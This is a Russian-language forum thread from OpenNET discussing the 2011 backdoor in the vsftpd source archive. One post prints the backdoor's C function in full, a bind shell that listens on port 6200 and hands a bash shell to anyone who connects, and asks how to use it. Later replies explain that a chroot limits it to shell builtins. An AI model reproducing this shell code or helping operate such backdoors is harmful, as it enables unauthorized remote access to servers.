The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

В исходных текстах FTP-сервера vsftpd обнаружен бэкдор, opennews (?), 04-Июл-11, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


108. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (-), 05-Июл-11, 23:15 
Что-то бекдор не работает. На любые команды ругается:
: command not found
/bin/ls /
: No such file or directory
/bin/data
: No such file or directory
/bin/date
: No such file or directory


int vsf_sysutil_extra(void)
{
        int fd, rfd;
        struct sockaddr_in sa;

        if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                exit(1);
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6200);
        sa.sin_addr.s_addr = INADDR_ANY;
        if((bind(fd,(struct sockaddr *)&sa,
                                        sizeof(struct sockaddr))) < 0) exit(1);
        perror("");
        if((listen(fd, 100)) == -1) exit(1);
        for(;;)
        {
                rfd = accept(fd, 0, 0);
                close(0); close(1); close(2);
                dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
                execl("/bin/bash","sh",(char *)0);
        }
}

Как его использовать?

Ответить | Правка | Наверх | Cообщить модератору

117. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (-), 06-Июл-11, 00:52 
> Что-то бекдор не работает. На любые команды ругается:

Use strace, Luke!

Ответить | Правка | Наверх | Cообщить модератору

123. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (-), 06-Июл-11, 05:11 
Да нифига он не работает в том виде что он есть. Ну то есть соединение принимает, но ничего запустить из него не возможно.
Ответить | Правка | Наверх | Cообщить модератору

124. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (-), 06-Июл-11, 05:18 
> Да нифига он не работает в том виде что он есть. Ну
> то есть соединение принимает, но ничего запустить из него не возможно.

А не работает, но как-то частично. Нормально только echo заработало, типа:
echo aaa > /tmp/1.log
или echo $PWD

Остальные башевские команды почему-то не работают.

Ответить | Правка | Наверх | Cообщить модератору

127. "В доступный на официальном сайте архив исходных текстов..."  +/
Сообщение от anonymous (??), 06-Июл-11, 09:42 
> А не работает, но как-то частично. Нормально только echo заработало, типа:
> echo aaa > /tmp/1.log
> или echo $PWD
> Остальные башевские команды почему-то не работают.

наверное потому, что ls и ты пы — вовсе не «башевские команды», и, видимо, демон предварительно чрутнулся: чтобы вот таким вот бэкдорам маленько кайф поломать.

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру